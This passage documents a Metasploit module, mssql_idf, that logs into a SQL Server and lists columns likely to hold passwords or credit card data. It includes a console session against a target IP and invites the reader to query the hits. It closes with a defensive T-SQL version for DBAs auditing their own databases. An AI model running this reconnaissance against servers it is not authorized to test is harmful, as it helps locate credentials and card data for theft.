Usage is fairly simple: set the standard parameters and run exploit. By default it searches for columns whose names include the words passw, bank, credit and card. To change these, set the NAMES field to a pipe-separated list of names to look for.
Once installed you can find the module in auxiliary/admin/mssql/mssql_idf.
Example
msf > use auxiliary/admin/mssql/mssql_idf
msf auxiliary(mssql_idf) > show options
Module options:
Name      Current Setting         Required  Description
----      ---------------         --------  -----------
NAMES     passw|bank|credit|card  yes       Pipe separated list of column names
PASSWORD                          no        The password for the specified username
RHOST                             yes       The target address
RPORT     1433                    yes       The target port
USERNAME  sa                      no        The username to authenticate as
msf auxiliary(mssql_idf) > set PASSWORD MyPass
PASSWORD => MyPass
msf auxiliary(mssql_idf) > set RHOST 192.168.0.54
RHOST => 192.168.0.54
msf auxiliary(mssql_idf) > exploit
Database       Schema     Table             Column                 Data Type Row Count
============== ========== ================= ====================== ========= =========
msdb           dbo        backupmediaset    is_password_protected  bit       0
msdb           dbo        backupset         is_password_protected  bit       0
AdventureWorks Person     Address           MyPassword             nchar     19614
AdventureWorks Purchasing Vendor            CreditRating           tinyint   104
AdventureWorks Person     Contact           PasswordHash           varchar   19972
AdventureWorks Person     Contact           PasswordSalt           varchar   19972
AdventureWorks Sales      ContactCreditCard CreditCardID           int       19118
AdventureWorks Sales      CreditCard        CreditCardID           int       19118
AdventureWorks Sales      CreditCard        CardType               nvarchar  19118
AdventureWorks Sales      CreditCard        CardNumber             nvarchar  19118
AdventureWorks Sales      SalesOrderHeader  CreditCardID           int       31465
AdventureWorks Sales      SalesOrderHeader  CreditCardApprovalCode varchar   31465
[*] Auxiliary module execution completed
As you can see, it has found a number of interesting-looking columns; the
row count field should help identify which ones can be ignored or given
lower priority. It is now over to you to start querying them to check for data.
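For a DBA who wants the same inventory of their own database, for example to decide which columns need encryption or masking, the search can be written directly in T-SQL. This is an added example, not the module's own code; it assumes SQL Server 2016 or later (for STRING_SPLIT) and covers only the database it is run in, and the @names variable is a name chosen here to mirror the NAMES option.

```sql
-- Added example (not taken from mssql_idf): list columns in the current
-- database whose names contain any of the pipe-separated keywords, with
-- data type and an approximate row count for prioritising review.
DECLARE @names nvarchar(200) = N'passw|bank|credit|card';

SELECT DB_NAME() AS [Database],
       s.name    AS [Schema],
       t.name    AS [Table],
       c.name    AS [Column],
       ty.name   AS [Data Type],
       -- Row count from partition metadata; index_id 0 = heap, 1 = clustered
       -- index, so each table is counted once without scanning it.
       (SELECT SUM(p.rows)
          FROM sys.partitions AS p
         WHERE p.object_id = t.object_id
           AND p.index_id IN (0, 1)) AS [Row Count]
FROM sys.columns AS c
JOIN sys.tables  AS t  ON t.object_id     = c.object_id
JOIN sys.schemas AS s  ON s.schema_id     = t.schema_id
JOIN sys.types   AS ty ON ty.user_type_id = c.user_type_id
-- EXISTS rather than a join, so a column matching two keywords
-- (CreditCardID matches both "credit" and "card") is listed once.
WHERE EXISTS (SELECT 1
                FROM STRING_SPLIT(@names, N'|') AS k
               WHERE k.value <> N''
                 AND c.name LIKE N'%' + k.value + N'%')
ORDER BY [Row Count] DESC, s.name, t.name, c.name;
```

Whether the match is case-sensitive depends on the database collation, and keywords containing %, _ or [ are treated as LIKE wildcards.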